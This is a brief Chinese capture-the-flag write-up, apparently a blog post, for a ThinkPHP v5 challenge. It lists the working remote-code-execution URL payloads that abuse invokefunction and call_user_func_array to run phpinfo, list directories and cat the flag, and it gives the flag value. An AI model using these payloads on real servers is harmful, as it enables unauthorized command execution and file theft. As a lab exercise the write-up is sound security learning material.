php_rce

打开就看到是一个ThinkPHP v5页面

ThinkPHP v5有RCE漏洞

先查看index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

发现phpinfo查看成功

之后index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls查看文件

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ..

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../..

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../../看到flag

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat ../../../flag

得到flag

flag{thinkphp5_rce}

posted @ 2020-11-28 22:35 hktk1643 阅读(91) 评论(0) 编辑收藏举报

刷新页面返回顶部

hktk1643